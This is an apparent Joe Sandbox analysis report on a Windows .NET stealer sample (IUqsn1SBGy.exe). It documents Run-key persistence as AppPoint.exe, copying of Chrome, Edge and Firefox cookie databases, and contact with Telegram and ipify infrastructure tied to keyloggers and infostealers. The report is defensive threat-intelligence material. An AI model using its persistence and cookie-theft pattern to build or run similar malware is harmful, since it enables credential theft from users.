Classification:	mal100.troj.spyw.evad.winEXE@15/18@4/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 350 Number of non-executed functions: 44
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target AppPoint.exe, PID 7512 because it is empty
Execution Graph export aborted for target AppPoint.exe, PID 7724 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:53:42	API Interceptor	4999596x Sleep call for process: IUqsn1SBGy.exe modified
10:53:44	API Interceptor	32x Sleep call for process: powershell.exe modified
10:53:57	API Interceptor	8031478x Sleep call for process: AppPoint.exe modified
16:53:48	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AppPoint C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
16:53:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AppPoint C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.26.13.205	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	BiXS3FRoLe.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	lEUy79aLAW.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	104.26.13.205
	7DpzcPcsTS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	B8FnDUj8hy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	FSRHC6mB16.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	9pIm5d0rsW.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	VYLigyTDuW.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://www.tremendous.com/email/activate/yE_yBdRtyVv4Xqgg7hu_	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
api.telegram.org	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	https://cjerichmond.jimdosite.com/	Get hash	malicious	Unknown	Browse	162.159.128.70
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	https://zfrmz.com/3GiGYUP4BArW2NBgkPU3	Get hash	malicious	Unknown	Browse	104.18.94.41

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 104.26.13.205
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220 104.26.13.205
	ID_Badge_Policy.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	149.154.167.220 104.26.13.205
	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220 104.26.13.205
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	149.154.167.220 104.26.13.205
	7DpzcPcsTS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 104.26.13.205
	B8FnDUj8hy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 104.26.13.205
	FSRHC6mB16.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220 104.26.13.205
	9pIm5d0rsW.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220 104.26.13.205
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 104.26.13.205

Process:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IUqsn1SBGy.exe.log

Download File

Process:	C:\Users\user\Desktop\IUqsn1SBGy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.3810236212315665
Encrypted:	false
SSDEEP:	48:lylWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMugeC/ZPUyus:lGLHxv2IfLZ2KRH6Oug8s
MD5:	46CFAD7E103735ABA6646E3E9F6012AF
SHA1:	F864D5F42D478A79AF32EAE14B87265DE193A851
SHA-256:	55D9A9F40CF5657C548085C6C2472DF452CF3B1A75515C52F59D8853C5F39E74
SHA-512:	8AE818C136BC9AD5A375BDF9B7688C900C8CBE69A17660D428618259E680F338557E5DFF9897E1414E95E2AB1F5B9792965C20FAB7320648FB0B430C10F81A48
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0baoyk3y.dfs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0aht11y.imd.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbbtgkm2.o2b.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f51ijsru.1n3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Download File

Process:	C:\Users\user\Desktop\IUqsn1SBGy.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	872968
Entropy (8bit):	7.572453331291594
Encrypted:	false
SSDEEP:	24576:SMu2uO0l+nEXtAdU6xp8flT4zgS4v8PeT/SWmqmo:BuT3upikcS4UmT/Ao
MD5:	DD800A9D42C8D41146C3F8F53CCD29F9
SHA1:	2C2B828705E4DDC314D3A9AEE659BAAD7CA650BD
SHA-256:	2E31BFBC51607F142E0413DB74CED776BB207448C052B9363250D2B93E718431
SHA-512:	F91712FE8B7A7382DE0EB32E0D158BE08D807C3868F164603EBBCFF9595B74141624DD1C2E571CD4964C8BED018F0796A299A88F23FA70D86192C8367064C38B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ubg..............0......B......N.... ........@.. .......................`............@.....................................S........>...............6...@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc....>.......@..................@..@.reloc.......@......................@..B................0.......H.......XH..........K........z.............................................?...y.}.]...a.E=.O.>.mrk....xO7...C`.......x.7#?.7.>...........MJ-lZ...+....0..<R...q..C...\|.@..T3...8.b.g.[.8...p.......F..}....H...r.P.C...2..6...,...r.x......D..VkD.,......:.........].......A....y9M..u.S5......"...Cj.N...7...,...C.:qam..+..H.Y..lc...F._....u.LP<.'.x`.C..7...f..=!.!...[.?..2J.c..:.^B...!`S^..R..>....A(.../6^.>TJ...bM0{[..m.Q.].f...a.c.~.......R.?.W].e+.L..f.v...\

C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\IUqsn1SBGy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\cio2h2mq.ale\Chrome\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cio2h2mq.ale\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cio2h2mq.ale\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite

Download File

Process:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\egewn0oj.fmc\Chrome\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\egewn0oj.fmc\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\egewn0oj.fmc\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite

Download File

Process:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\sifnkltx.vfn\Chrome\Default\Network\Cookies

Download File

Process:	C:\Users\user\Desktop\IUqsn1SBGy.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
